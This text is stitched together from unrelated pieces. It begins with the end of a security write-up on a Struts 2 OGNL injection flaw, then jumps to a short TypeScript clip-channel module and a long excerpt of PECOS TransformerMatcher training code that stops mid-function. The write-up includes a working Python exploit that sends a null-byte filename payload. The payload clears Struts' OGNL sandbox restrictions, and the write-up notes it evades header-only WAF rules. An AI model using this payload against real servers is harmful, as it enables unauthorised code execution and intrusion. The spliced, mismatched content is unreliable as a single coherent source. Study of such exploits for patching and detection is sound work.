One takeaway I had from this research is that you can’t always rely on reading CVE descriptions to understand how a vulnerability works. The reason this vulnerability was ever possible was that the file upload interceptor attempted to resolve error messages using a potentially dangerous function that evaluates OGNL. Eliminating this possibility is what led to a successful patch. The problem is therefore not with the Jakarta request wrapper, as the CVE description implies, but with the file upload interceptor trusting that exception messages will be free of user input.

Another takeaway reinforced the idea that you can’t rely on known attack signatures to block exploitation at the web application firewall level. For example, a web application firewall configured to look for OGNL in the Content-Type header would miss the additional attack vector explained in this post. The only reliable way to eliminate vulnerabilities like this one is to apply available patches, either manually or by installing updates.
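To make the point about signature-based filtering concrete, here is a companion sketch, again an illustration rather than part of the original research, that sends the null-byte filename vector described above. The multipart body is assembled by hand because most HTTP client libraries sanitize filenames; notice that the Content-Type header itself is completely benign:

# Minimal sketch: alternate vector with a raw null byte in the multipart filename.
# The OGNL lives in the request body, so a WAF rule matching only the
# Content-Type header never fires.
# Assumptions: vulnerable Struts 2.5.10 showcase at localhost:8080; requests installed.
import requests

boundary = "x1313189278108275512788994811"  # arbitrary
ognl = (
    "${(#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    "(#ognlUtil.getExcludedPackageNames().clear())."
    "(#ognlUtil.getExcludedClasses().clear())."
    "(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']"
    ".addHeader('X-Struts-Exploit-Test','GDSTEST'))}"
)
body = (
    f"--{boundary}\r\n"
    f'Content-Disposition: form-data; name="upload"; filename="a\x00{ognl}"\r\n'
    "Content-Type: text/html\r\n"
    "\r\n"
    "test\r\n"
    f"--{boundary}--\r\n"
).encode("latin-1")

r = requests.post(
    "http://localhost:8080/struts2-showcase/",
    headers={"Content-Type": f"multipart/form-data; boundary={boundary}"},
    data=body,
)
print(r.status_code, r.headers.get("X-Struts-Exploit-Test"))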
import ClipChannel from './clip_channel_model';

// Register a channel for clip tracking.
async function add(channelId: string, channelName: string): Promise<void> {
  await new ClipChannel({ channelId, channelName }).save();
}

// Stop tracking a channel by removing its record.
async function remove(channelId: string): Promise<void> {
  await ClipChannel.findOneAndRemove({ channelId });
}

// Check whether a channel is currently tracked.
async function has(channelId: string): Promise<boolean> {
  return Boolean(await ClipChannel.findOne({ channelId }));
}

export default {
  add,
  remove,
  has,
};
# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance # with the License. A copy of the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES # OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions # and limitations under the License. import copy import json import logging import multiprocessing as mp import os import tempfile import time import dataclasses as dc import numpy as np import pecos import scipy.sparse as smat import torch import transformers from pecos.core import clib from pecos.utils import parallel_util, smat_util, torch_util from pecos.xmc import MLModel, MLProblem, PostProcessor from sklearn.preprocessing import normalize as sk_normalize from torch.nn.utils.rnn import pad_sequence from torch.utils.data import DataLoader, RandomSampler, SequentialSampler from transformers import AdamW, AutoConfig, get_scheduler from .module import XMCDataset from .network import ENCODER_CLASSES, HingeLoss, TransformerLinearXMCHead logging.getLogger(transformers.__name__).setLevel(logging.WARNING) LOGGER = logging.getLogger(__name__) class TransformerMatcher(pecos.BaseClass): """Transformer Matcher Model Construct, fine-tune the transformers and predict on a fixed output label space. """ LOSS_FUNCTION_TYPES = { "hinge": HingeLoss(margin=1.0, power=1), "squared-hinge": HingeLoss(margin=1.0, power=2), "weighted-hinge": HingeLoss(margin=1.0, power=1, cost_weighted=True), "weighted-squared-hinge": HingeLoss(margin=1.0, power=2, cost_weighted=True), "cross-entropy": torch.nn.BCEWithLogitsLoss(reduction="sum"), } @dc.dataclass class TrainParams(pecos.BaseParams): # type: ignore """Training Parameters of MLModel model_shortcut (str): string of pre-trained model shortcut. Default 'bert-base-cased' negative_sampling (str): negative sampling types. Default tfn loss_function (str): type of loss function to use for transformer training. Default 'squared-hinge' bootstrap_method (str): algorithm to bootstrap text_model. If not None, initialize TransformerMatcher projection layer with one of: 'linear' (default): linear model trained on final embeddings of parent layer 'inherit': inherit weights from parent labels lr_schedule (str): learning rate schedule. See transformers.SchedulerType for details. Default 'linear' threshold (float): threshold to sparsify the model weights. Default 0.1 hidden_dropout_prob (float): hidden dropout prob in deep transformer models. Default 0.1 batch_size (int): batch size for transformer training. Default 8 batch_gen_workers (int): number of workers for batch generation. Default 4 max_active_matching_labels (int): max number of active matching labels, will sub-sample from existing negative samples if necessary. Default None to ignore max_num_labels_in_gpu (int): Upper limit on labels to put output layer in GPU. Default 65536. max_steps (int): if > 0: set total number of training steps to perform. Override num-train-epochs. Default -1. max_no_improve_cnt (int): if > 0, training will stop when this number of validation steps result in no improvement. Default -1. num_train_epochs (int): total number of training epochs to perform. Default 5 gradient_accumulation_steps (int): number of updates steps to accumulate before performing a backward/update pass. Default 1. 
        weight_decay (float): weight decay rate for regularization. Default 0 to ignore
        max_grad_norm (float): max gradient norm used for gradient clipping. Default 1.0
        learning_rate (float): maximum learning rate for Adam. Default 5e-5
        adam_epsilon (float): epsilon for Adam optimizer. Default 1e-8
        warmup_steps (int): learning rate warmup over warmup-steps. Default 0
        logging_steps (int): log training information every NUM update steps. Default 50
        save_steps (int): save checkpoint every NUM update steps. Default 100
        no_fine_tune (bool, optional): whether to skip fine-tuning on the transformer text_encoder. Default False
        disable_gpu (bool, optional): whether to avoid using GPU even if available. Default False
        model_dir (str): path to save training checkpoints. Default empty to use a temp dir.
        cache_dir (str): dir to store the pre-trained models downloaded from s3. Default empty to use a temp dir.
        init_model_dir (str): path to load checkpoint of TransformerMatcher. If given, start from the
            given checkpoint rather than downloading a pre-trained model from S3. Default empty to ignore
        saved_trn_pt (str): dir to save/load tokenized train tensors. Default empty to ignore
        saved_val_pt (str): dir to save/load tokenized validation tensors. Default empty to ignore
        save_emb_dir (str): dir to save instance embeddings. Default empty to ignore
        """

        model_shortcut: str = "bert-base-cased"
        negative_sampling: str = "tfn"
        loss_function: str = "squared-hinge"
        bootstrap_method: str = "linear"
        lr_schedule: str = "linear"
        threshold: float = 0.1
        hidden_dropout_prob: float = 0.1
        batch_size: int = 8
        batch_gen_workers: int = 4
        max_active_matching_labels: int = None  # type: ignore
        max_num_labels_in_gpu: int = 65536
        max_steps: int = 0
        max_no_improve_cnt: int = -1
        num_train_epochs: int = 5
        gradient_accumulation_steps: int = 1
        weight_decay: float = 0
        max_grad_norm: float = 1.0
        learning_rate: float = 5e-5
        adam_epsilon: float = 1e-8
        warmup_steps: int = 0
        logging_steps: int = 50
        save_steps: int = 100
        no_fine_tune: bool = False
        disable_gpu: bool = False
        model_dir: str = ""
        cache_dir: str = ""
        init_model_dir: str = ""
        saved_trn_pt: str = ""
        saved_val_pt: str = ""
        save_emb_dir: str = ""  # a str path, matching the docstring and the os.path.join usage below

    @dc.dataclass
    class PredParams(pecos.BaseParams):  # type: ignore
        """Prediction Parameters of MLModel

        only_topk (int, optional): the only topk specified in the model. Default to 20
        post_processor (str, optional): the post_processor specified in the model. Default to "noop"
        ensemble_method (str, optional): micro ensemble method to generate prediction. Default to "transformer-only".
            See TransformerMatcher.ensemble_prediction for details.
        truncate_length (int, optional): length to truncate input text, default None to skip truncation.
        """

        only_topk: int = 20
        post_processor: str = "noop"
        ensemble_method: str = "transformer-only"
        truncate_length: int = None  # type: ignore

        def override_with_kwargs(self, pred_kwargs):
            """Override class attributes from prediction keyword arguments.

            Args:
                pred_kwargs (dict): Args for prediction.

            Returns:
                self (PredParams): Overridden self instance.
""" if pred_kwargs is not None: if not isinstance(pred_kwargs, dict): raise TypeError("type(pred_kwargs) must be dict") overridden_only_topk = pred_kwargs.get("only_topk", None) overridden_post_processor = pred_kwargs.get("post_processor", None) overridden_ensemble_method = pred_kwargs.get("ensemble_method", None) overridden_truncate_length = pred_kwargs.get("truncate_length", None) if overridden_only_topk: self.only_topk = overridden_only_topk if overridden_post_processor: self.post_processor = overridden_post_processor if overridden_ensemble_method: self.ensemble_method = overridden_ensemble_method if overridden_truncate_length: self.truncate_length = overridden_truncate_length return self def __init__( self, text_encoder, text_tokenizer, text_model, C=None, concat_model=None, train_params=None, pred_params=None, ): """ Args: text_encoder (BertForXMC, RobertaForXMC or XLNetForXMC): text text_encoder using transformer model text_tokenizer (BertTokenizer, RobertaTokenizer or XLNetTokenizer): text text_tokenizer for to convert raw text to torch tensors text_model (TransformerLinearXMCHead): linear projection from transformer text_encoder to label space C (csr_matrix): clustering matrix, shape = (nr_labels, nr_code) concat_model (MLModel): linear model that takes concatenation of transformer embeddings and input numerical features to predict on label space train_params (TransformerMatcher.TrainParams, optional): instance of TransformerMatcher.TrainParams. pred_params (TransformerMatcher.PredParams, optional): instance of TransformerMatcher.PredParams. """ self.text_encoder = text_encoder self.text_tokenizer = text_tokenizer self.C = C self.text_model = text_model self.concat_model = concat_model self.train_params = self.TrainParams.from_dict(train_params) self.pred_params = self.PredParams.from_dict(pred_params) def get_pred_params(self): return copy.deepcopy(self.pred_params) def to_device(self, device, n_gpu=0): """Move the text_encoder to desired device Args: device (torch.device): the destination device n_gpu (int, optional): if > 1, text_encoder will be converted to torch.nn.DataParallel to use multi-GPU """ self.text_encoder.to(device) # multi-gpu eval if n_gpu > 1 and not isinstance(self.text_encoder, torch.nn.DataParallel): self.text_encoder = torch.nn.DataParallel(self.text_encoder) return self def clear_cuda(self): """Clear CUDA memory""" if hasattr(self.text_encoder, "module"): self.text_encoder = self.text_encoder.module self.text_encoder.to(torch.device("cpu")) self.text_model.to(torch.device("cpu")) torch.cuda.empty_cache() return self @classmethod def get_loss_function(cls, loss_function): """Get the loss function for training Args: loss_function (str): type of loss function, in TransformerMatcher.LOSS_FUNCTION_TYPES Returns: loss_function (torch.nn.module) """ return cls.LOSS_FUNCTION_TYPES[loss_function] @property def device(self): """Get the current device of the text_encoder Returns: torch.device """ if hasattr(self.text_encoder, "module"): return self.text_encoder.module.device else: return self.text_encoder.device @property def nr_codes(self): """Get the number of codes""" return self.C.shape[1] @property def nr_features(self): """Get the feature dimension of concat_model""" return self.concat_model.nr_features if self.concat_model else None @property def nr_labels(self): """Get the number of labels""" return self.text_model.num_labels def save(self, save_dir): """Save the models, text_tokenizer and training arguments to file Args: save_dir (str): dir to save the model, 
will be created if it doesn't exist """ os.makedirs(save_dir, exist_ok=True) # use .module when do parallel training encoder_to_save = ( self.text_encoder.module if hasattr(self.text_encoder, "module") else self.text_encoder ) param = { "model": self.__class__.__name__, "text_encoder": encoder_to_save.__class__.__name__, "nr_labels": self.nr_labels, "nr_features": self.nr_features, "nr_codes": self.nr_codes, "train_params": self.train_params.to_dict(), "pred_params": self.pred_params.to_dict(), } param = self.append_meta(param) with open(os.path.join(save_dir, "param.json"), "w", encoding="utf-8") as f: f.write(json.dumps(param, indent=True)) smat_util.save_matrix(os.path.join(save_dir, "C.npz"), self.C) encoder_dir = os.path.join(save_dir, "text_encoder") os.makedirs(encoder_dir, exist_ok=True) # this creates config.json, pytorch_model.bin encoder_to_save.save_pretrained(encoder_dir) # this creates text_tokenizer files tokenizer_dir = os.path.join(save_dir, "text_tokenizer") os.makedirs(tokenizer_dir, exist_ok=True) self.text_tokenizer.save_pretrained(tokenizer_dir) # this creates text_model text_model_dir = os.path.join(save_dir, "text_model") torch.save(self.text_model, text_model_dir) # save the concat_model concat_model_dir = os.path.join(save_dir, "concat_model") if self.concat_model: self.concat_model.save(concat_model_dir) @classmethod def load(cls, load_dir): """Load models, text_tokenizer and training arguments from file Args: load_dir (str): dir to load the models, text_tokenizer and training arguments Returns: TransformerMatcher """ # load TrainParams and PredParams param_dir = os.path.join(load_dir, "param.json") param = dict() if os.path.exists(param_dir): param = json.loads(open(param_dir, "r").read()) train_params = cls.TrainParams.from_dict(param.get("train_params", None)) pred_params = cls.PredParams.from_dict(param.get("pred_params", None)) # load text_encoder encoder_dir = os.path.join(load_dir, "text_encoder") if not os.path.isdir(encoder_dir): raise ValueError(f"text_encoder does not exist at {encoder_dir}") with open(os.path.join(encoder_dir, "config.json"), "r", encoding="utf-8") as fin: transformer_type = json.loads(fin.read())["model_type"] dnn_type = ENCODER_CLASSES[transformer_type] encoder_config = dnn_type.config_class.from_pretrained(encoder_dir) text_encoder, loading_info = dnn_type.model_class.from_pretrained( encoder_dir, config=encoder_config, output_loading_info=True ) if len(loading_info["missing_keys"]) > 0: LOGGER.warning( "Weights of {} not initialized from pre-trained text_encoder: {}".format( text_encoder.__class__.__name__, loading_info["missing_keys"] ) ) # load text_tokenizer tokenizer_dir = os.path.join(load_dir, "text_tokenizer") if not os.path.isdir(tokenizer_dir): raise ValueError(f"text_tokenizer does not exist at {tokenizer_dir}") text_tokenizer = dnn_type.tokenizer_class.from_pretrained(tokenizer_dir) # load text_model text_model_dir = os.path.join(load_dir, "text_model") if os.path.exists(text_model_dir): text_model = torch.load(text_model_dir) else: text_model = TransformerLinearXMCHead( encoder_config.hidden_size, encoder_config.num_labels ) LOGGER.warning( f"XMC text_model of {text_encoder.__class__.__name__} not initialized from pre-trained model." 
) # load C C_path = os.path.join(load_dir, "C.npz") if not os.path.exists(C_path): raise ValueError(f"Cluster code does not exist at {C_path}") C = smat_util.load_matrix(C_path) # load concat_model concat_model_dir = os.path.join(load_dir, "concat_model") concat_model = None if os.path.exists(concat_model_dir): concat_model = MLModel.load(concat_model_dir) return cls( text_encoder, text_tokenizer, text_model, C=C, concat_model=concat_model, train_params=train_params, pred_params=pred_params, ) @classmethod def download_model(cls, model_shortcut, num_labels, hidden_dropout_prob=0.1, cache_dir=""): """Initialize a matcher by downloading a pre-trained model from s3 Args: model_shortcut (str): model name shortcut, e.g. 'bert-base-cased' num_labels (int): model output size hidden_dropout_prob (float, optional): hidden states dropout probability. Default 0.1 cache_dir (str, optional): path to store downloaded model, if the model already exists at cache_dir, downloading will be ignored Returns: TransformerMatcher """ use_cache = cache_dir if cache_dir else None # AutoConfig will infer transformer type from shortcut config = AutoConfig.from_pretrained( model_shortcut, hidden_dropout_prob=hidden_dropout_prob, output_hidden_states=False, summary_use_proj=False, num_labels=num_labels, finetuning_task=None, cache_dir=use_cache, # if None, create temp folder ) if config.model_type not in ENCODER_CLASSES: raise ValueError(f"Model type {config.model_type} not supported.") dnn_type = ENCODER_CLASSES[config.model_type] text_tokenizer = dnn_type.tokenizer_class.from_pretrained( model_shortcut, cache_dir=use_cache, ) text_encoder = dnn_type.model_class.from_pretrained( model_shortcut, config=config, cache_dir=use_cache, ) text_model = TransformerLinearXMCHead(config.hidden_size, num_labels) return cls(text_encoder, text_tokenizer, text_model) def text_to_tensor(self, corpus, num_workers=4, max_length=None): """Convert input text corpus into padded tensors Args: corpus (iterable over str): input text strings num_workers (int, optional): number of processors to use for data encoding. Default 4 max_length(int, optional): max length to which input text will be padded/truncated. 
Default None to use the max length in the corpus Returns: feature_tensors (dict): { "input_ids": tensor of input token ids, "attention_mask": tensor of attention masks, "token_type_ids": tensor of token type ids, } """ convert_kwargs = { "add_special_tokens": True, "padding": "max_length", "truncation": True, "max_length": max_length, "return_tensors": "pt", # return pytorch tensors "return_token_type_ids": True, "return_attention_mask": True, } num_workers = min(len(corpus), num_workers) # generate inst feature batches chunk_size = (len(corpus) + num_workers - 1) // num_workers data_chunks = [corpus[chunk_size * i : chunk_size * (i + 1)] for i in range(num_workers)] LOGGER.info( "***** Encoding data with {} workers, len={} truncation={}*****".format( num_workers, len(corpus), max_length ) ) t_start = time.time() pool = mp.get_context("spawn").Pool(processes=num_workers) async_results = [ pool.apply_async( parallel_util.call_instance_method, args=( self.text_tokenizer, self.text_tokenizer.batch_encode_plus.__name__, (), dict( convert_kwargs, batch_text_or_text_pairs=data_chunks[i], ), ), ) for i in range(num_workers) ] pool.close() map(mp.pool.ApplyResult.get, async_results) result_lists = [r.get() for r in async_results] LOGGER.info("***** Finished with time cost={} *****".format(time.time() - t_start)) feature_tensors = {} if len(result_lists) > 1: keys_ = [ ("input_ids", self.text_tokenizer.pad_token_id), ("attention_mask", 0), ("token_type_ids", 1), ] # for split sequence chunks to list of sequences since pad_sequence requires # all trailing dimensions to be the same for kw, pad_val in keys_: feature_tensors[kw] = ( pad_sequence( sum( [ list(torch.chunk(t[kw].T, t[kw].shape[0], dim=1)) for t in result_lists ], [], ), batch_first=True, padding_value=pad_val, ) .permute(1, 0, 2) .flatten(1) .T ) else: feature_tensors = result_lists[0] return feature_tensors @staticmethod def _get_label_tensors(M, Y, idx_padding=-1, val_padding=0, max_labels=None): """ Given matching matrix M and label matrix Y, construct label tensors for XMC training The non-zero indices of Y are seen as positive labels and therefore all included in the result. Example: M = smat.csr_matrix([[1, 1, 0, 0], [0, 0, 1, 1]]) Y = smat.csr_matrix([[0, 1, 0, 2], [0, 0, 0, 3]]) then the returned values will be: label_indices = torch.LongTensor([[1, 3, 0], [3, 2, -1]]) label_values = torch.FloatTensor([[1., 2., 0.], [3., 0., 0.]]) Args: M (csr_matrix or None): matching matrix, shape = (nr_inst, nr_labels) It's indices are the candidate label indices to consider It's values will not be used Y (csr_matrix or None): label matrix, shape = (nr_inst, nr_labels) It's non-zero indices are positive labels and will always be included. idx_padding (int, optional): the index used to pad all label_indices to the same length. Default -1 val_padding (float, optional): the value used to fill in label_values corresponding to the zero entrees in Y. Default 0 max_labels (int, optional): max number of labels considered for each instance, will subsample from existing label indices if need to. Default None to use max row nnz of M. Returns: label_indices (torch.LongTensor or None): containing label indices with shape = (nr_inst, max_labels). Return None if M is None label_values (torch.FloatTensor or None): containing label values with shape = (nr_inst, max_labels). 
If Y is None, return None """ if M is None and Y is None: return None, None elif M is None and Y is not None: # if M is None, taking all labels into account return None, torch.FloatTensor(Y.toarray()) if Y is not None: if Y.shape != M.shape: raise ValueError("Y and M shape mismatch: {} and {}".format(Y.shape, M.shape)) label_lower_bound = max(Y.indptr[1:] - Y.indptr[:-1]) # make sure all positive labels are included M1 = smat_util.binarized(M) + smat_util.binarized(Y) else: M1 = M label_lower_bound = 0 label_upper_bound = max(M1.indptr[1:] - M1.indptr[:-1]) if max_labels is None: max_labels = label_upper_bound else: max_labels = min(max_labels, label_upper_bound) if max_labels < label_lower_bound: max_labels = label_lower_bound LOGGER.warning( f"Increasing max_labels to {label_lower_bound} to accommodate all positive labels." ) nr_inst = M1.shape[0] label_indices = np.zeros((nr_inst, max_labels), dtype=np.int64) + idx_padding if Y is not None: label_values = np.zeros((nr_inst, max_labels), dtype=np.float32) + val_padding for i in range(nr_inst): offset = 0 neg_samples = M1.indices[M1.indptr[i] : M1.indptr[i + 1]] # fill with positive samples first if Y is not None: y_nnz = Y.indptr[i + 1] - Y.indptr[i] rng = slice(Y.indptr[i], Y.indptr[i + 1]) label_indices[i, :y_nnz] = Y.indices[rng] label_values[i, :y_nnz] = Y.data[rng] offset += y_nnz neg_samples = neg_samples[np.invert(np.isin(neg_samples, Y.indices[rng]))] # fill the rest slots with negative samples if neg_samples.size > max_labels - offset: # random sample negative labels neg_samples = np.random.choice(neg_samples, max_labels - offset) label_indices[i, offset : offset + neg_samples.size] = neg_samples label_indices = torch.LongTensor(label_indices) return label_indices, None if Y is None else torch.FloatTensor(label_values) @staticmethod def ensemble_prediction(transformer_pred_csr, concat_pred_csr, only_topk, ens_method): """Generate micro ensemble of concat predictions and transformer predictions Args: transformer_pred_csr (csr_matrix): transformer prediction matrix concat_pred_csr (csr_matrix): concat_model prediction matrix only_topk (int): number of top predictions to gather ens_method (str): the method used for micro ensemble. 
Choices: concat-only: only use concat model predictions transformer-only: only use transformer predictions rank_average: rank-average concat/transformer predictions round_robin: round robin ensemble liner/transformer predictions average: average concat/transformer predictions Returns: ensemble_pred_csr (csr_matrix) """ if transformer_pred_csr.shape != concat_pred_csr.shape: raise ValueError( f"Transformer/concat prediction mismatch: {transformer_pred_csr.shape} and {concat_pred_csr.shape}" ) LOGGER.info(f"Using {ens_method} for transformer/concat ensemble of pred_csr") if ens_method == "concat-only": pred_csr_codes = concat_pred_csr elif ens_method == "transformer-only": pred_csr_codes = transformer_pred_csr elif ens_method == "average": pred_csr_codes = smat_util.CsrEnsembler.average( smat_util.sorted_csr(transformer_pred_csr), smat_util.sorted_csr(concat_pred_csr), ) elif ens_method == "rank_average": pred_csr_codes = smat_util.CsrEnsembler.rank_average( smat_util.sorted_csr(transformer_pred_csr), smat_util.sorted_csr(concat_pred_csr), ) elif ens_method == "round_robin": pred_csr_codes = smat_util.CsrEnsembler.round_robin( smat_util.sorted_csr(transformer_pred_csr), smat_util.sorted_csr(concat_pred_csr), ) else: raise ValueError(f"Unknown ensemble method {ens_method}") return smat_util.sorted_csr(pred_csr_codes.astype(np.float32), only_topk=only_topk) def predict( self, X_text, X_feat=None, csr_codes=None, pred_params=None, **kwargs, ): """Predict with the transformer matcher, allow batch prediction to reduce memory cost Args: X_text (list of str or dict): prediction input text or dictionary of encoded tensors: { "input_ids": tensor of input token ids, "attention_mask": tensor of attention masks, "token_type_ids": tensor of token type ids, } X_feat (csr_matrix or ndarray, optional): prediction instance feature matrix, shape = (nr_insts, nr_features) csr_codes (csr_matrix, optional): matching matrix, shape = (nr_inst, nr_codes), only its non-zero entrees will be evaluated. Its values will be combined with current prediction through post_processor. Default None to consider all labels. pred_params (TransformerMatcher.PredParams, optional): instance of TransformerMatcher.PredParams or dictionary to override stored pred_params. Default None to ignore overriding kwargs: batch_size (int, optional): total batch_size for (multi-GPU) forward propagation. Default 8 batch_gen_workers (int, optional): number of CPU workers for batch generation. Default 4 pred_chunk_size (int, optional): maximum number of instances to predict on for each round. Default None to predict on all instances at once. 
Returns: label_pred (csr_matrix): label prediction logits, shape = (nr_inst, nr_labels) embeddings (ndarray): array of instance embeddings shape = (nr_inst, hidden_dim) """ if pred_params is None: pred_params = self.get_pred_params() elif isinstance(pred_params, dict): pred_params = self.get_pred_params().override_with_kwargs(pred_params) elif not isinstance(pred_params, TransformerMatcher.PredParams): raise TypeError(f"Unsupported type for pred_params: {type(pred_params)}") if isinstance(X_text, list): X_text = self.text_to_tensor( X_text, num_workers=kwargs.get("batch_gen_workers", 4), max_length=pred_params.truncate_length, ) nr_inst = X_text["input_ids"].shape[0] pred_chunk_size = kwargs.pop("pred_chunk_size", None) if pred_chunk_size is None or pred_chunk_size >= nr_inst: label_pred, embeddings = self._predict( X_text, X_feat=X_feat, csr_codes=csr_codes, pred_params=pred_params, **kwargs, ) else: # batch prediction to avoid OOM embedding_chunks = [] P_chunks = [] for i in range(0, nr_inst, pred_chunk_size): cur_P, cur_embedding = self._predict( {k: v[i : i + pred_chunk_size] for k, v in X_text.items()}, X_feat=None if X_feat is None else X_feat[i : i + pred_chunk_size, :], csr_codes=None if csr_codes is None else csr_codes[i : i + pred_chunk_size, :], pred_params=pred_params, **kwargs, ) embedding_chunks.append(cur_embedding) P_chunks.append(cur_P) label_pred = smat_util.vstack_csr(P_chunks) embeddings = np.vstack(embedding_chunks) return label_pred, embeddings def _predict( self, X_text, X_feat=None, csr_codes=None, pred_params=None, **kwargs, ): """Predict with the transformer matcher Args: X_text (dict): prediction inputs, dictionary of tensors { "input_ids": tensor of input token ids, "attention_mask": tensor of attention masks, "token_type_ids": tensor of token type ids, } X_feat (csr_matrix or ndarray, optional): prediction instance feature matrix, shape = (nr_insts, nr_features) csr_codes (csr_matrix, optional): matching matrix, shape = (nr_inst, nr_codes), only its non-zero entrees will be evaluated. Its values will be combined with current prediction through post_processor. Default None to consider all labels. pred_params (TransformerMatcher.PredParams, optional): instance of TransformerMatcher.PredParams or dictionary to override stored pred_params. Default None to ignore overriding kwargs: batch_size (int, optional): total batch_size for (multi-GPU) forward propagation. Default 8 batch_gen_workers (int, optional): number of CPU workers for batch generation. 
Default 4 Returns: label_pred (csr_matrix): label prediction logits, shape = (nr_inst, nr_labels) embeddings (ndarray): array of instance embeddings shape = (nr_inst, hidden_dim) """ batch_gen_workers = kwargs.get("batch_gen_workers", 4) if csr_codes is not None: # need to keep explicit zeros in csr_codes_next # therefore do not pass it through constructor if not isinstance(csr_codes, smat.csr_matrix): raise TypeError(f"Got type={type(csr_codes)} for csr_codes!") # getting the result in csr by computing csr * csr csr_codes_next = clib.sparse_matmul( csr_codes, self.C.T, eliminate_zeros=False, threads=batch_gen_workers, ) LOGGER.info( "Predict with csr_codes_next({}) with avr_nnz={}".format( csr_codes_next.shape, csr_codes_next.nnz / csr_codes_next.shape[0] ) ) else: csr_codes_next = None LOGGER.info("Predict on input text tensors({})".format(X_text["input_ids"].shape)) label_indices_pt, label_values_pt = TransformerMatcher._get_label_tensors( csr_codes_next, None, idx_padding=self.text_model.label_pad ) data = XMCDataset( X_text["input_ids"], X_text["attention_mask"], X_text["token_type_ids"], torch.arange(X_text["input_ids"].shape[0]), label_values=label_values_pt, label_indices=label_indices_pt, ) # since number of active labels may vary # using pinned memory will slow down data loading dataloader = DataLoader( data, sampler=SequentialSampler(data), pin_memory=False, batch_size=kwargs.get("batch_size", 8), num_workers=batch_gen_workers, ) local_topk = min(pred_params.only_topk, self.nr_labels) embeddings = [] batch_cpred = [] for batch in dataloader: self.text_encoder.eval() self.text_model.eval() cur_batch_size = batch[0].shape[0] batch = tuple(t.to(self.device) for t in batch) with torch.no_grad(): inputs = { "input_ids": batch[0], "attention_mask": batch[1], "token_type_ids": batch[2], "instance_number": batch[3], "label_values": None, "label_indices": None if csr_codes_next is None else batch[-1], } text_model_W_seq, text_model_b_seq = self.text_model( output_indices=inputs["label_indices"], num_device=len(self.text_encoder.device_ids) if hasattr(self.text_encoder, "device_ids") else 1, ) outputs = self.text_encoder( input_ids=inputs["input_ids"], attention_mask=inputs["attention_mask"], token_type_ids=inputs["token_type_ids"], label_embedding=(text_model_W_seq, text_model_b_seq), ) c_pred = outputs["logits"] # get topk prediction if csr_codes_next is None: # take all labels into consideration cpred_csr = smat.csr_matrix(c_pred.cpu().numpy()) cpred_csr.data = PostProcessor.get(pred_params.post_processor).transform( cpred_csr.data, inplace=True ) cpred_csr = smat_util.sorted_csr(cpred_csr, only_topk=local_topk) batch_cpred.append(cpred_csr) else: cur_act_labels = csr_codes_next[inputs["instance_number"].cpu()] nnz_of_insts = cur_act_labels.indptr[1:] - cur_act_labels.indptr[:-1] inst_idx = np.repeat(np.arange(cur_batch_size, dtype=np.uint32), nnz_of_insts) label_idx = cur_act_labels.indices.astype(np.uint32) val = c_pred.cpu().numpy().flatten() val = val[ np.argwhere( inputs["label_indices"].cpu().flatten() != self.text_model.label_pad ) ].flatten() val = PostProcessor.get(pred_params.post_processor).transform(val, inplace=True) val = PostProcessor.get(pred_params.post_processor).combiner( val, cur_act_labels.data ) cpred_csr = smat_util.sorted_csr_from_coo( cur_act_labels.shape, inst_idx, label_idx, val, only_topk=local_topk ) batch_cpred.append(cpred_csr) embeddings.append(outputs["pooled_output"].cpu().numpy()) pred_csr_codes = smat_util.vstack_csr(batch_cpred) embeddings = 
np.concatenate(embeddings, axis=0) ens_method = pred_params.ensemble_method # concat_model prediction requires concat_model and X_feat if all(v is not None for v in [self.concat_model, X_feat]): cat_embeddings = sk_normalize(embeddings, axis=1, copy=True) if isinstance(X_feat, smat.csr_matrix): cat_embeddings = smat_util.dense_to_csr(cat_embeddings) cat_embeddings = smat_util.hstack_csr([X_feat, cat_embeddings], dtype=np.float32) else: cat_embeddings = np.hstack([X_feat, cat_embeddings]) concat_pred_csr_codes = self.concat_model.predict( cat_embeddings, csr_codes=csr_codes, # use original csr_codes rather than csr_codes_next only_topk=local_topk, post_processor=pred_params.post_processor, ) pred_csr_codes = TransformerMatcher.ensemble_prediction( pred_csr_codes, concat_pred_csr_codes, local_topk, ens_method ) elif self.concat_model is not None and ens_method != "transformer-only": LOGGER.warning( f"X_feat is missing for {ens_method} prediction, fall back to transformer-only" ) return pred_csr_codes, embeddings def fine_tune_encoder(self, prob, val_prob=None, val_csr_codes=None): """Fine tune the transformer text_encoder Args: prob (MLProblemWithText): training problem val_prob (MLProblemWithText, optional): validation problem val_csr_codes (csr_matrix, optional): prediction matrix for validation data, shape = (nr_val_inst, nr_codes) its values and indices will be used in combiner for next prediction Returns: TransformerMatcher """ train_params = self.train_params pred_params = self.pred_params loss_function = TransformerMatcher.get_loss_function(train_params.loss_function).to( self.device ) max_act_labels = train_params.max_active_matching_labels logging_steps = train_params.logging_steps max_steps = train_params.max_steps max_no_improve_cnt = train_params.max_no_improve_cnt if prob.M is not None: # need to keep explicit zeros in csr_codes_next # therefore do not pass it through constructor if not isinstance(prob.M, smat.csr_matrix): raise TypeError(f"Got type={type(prob.M)} for M!") # getting the result in csr by computing csr * csr M_next = clib.sparse_matmul( prob.M, self.C.T, eliminate_zeros=False, threads=train_params.batch_gen_workers, ) do_resample = max_act_labels is not None and max_act_labels < max( M_next.indptr[1:] - M_next.indptr[:-1] ) else: M_next = None do_resample = False if prob.M is None or train_params.max_num_labels_in_gpu >= self.nr_labels: # put text_model to GPU self.text_model.to(self.device) label_indices_pt, label_values_pt = TransformerMatcher._get_label_tensors( M_next, prob.Y, idx_padding=self.text_model.label_pad, max_labels=max_act_labels, ) train_data = XMCDataset( prob.X_text["input_ids"], prob.X_text["attention_mask"], prob.X_text["token_type_ids"], torch.arange(prob.X_text["input_ids"].shape[0]), # instance number label_values=label_values_pt, label_indices=label_indices_pt, ) # since number of active labels may vary # using pinned memory will slow down data loading train_dataloader = DataLoader( train_data, sampler=RandomSampler(train_data), pin_memory=False, batch_size=train_params.batch_size, num_workers=train_params.batch_gen_workers, ) # compute stopping criteria if train_params.max_steps > 0: t_total = train_params.max_steps steps_per_epoch = len(train_dataloader) // train_params.gradient_accumulation_steps 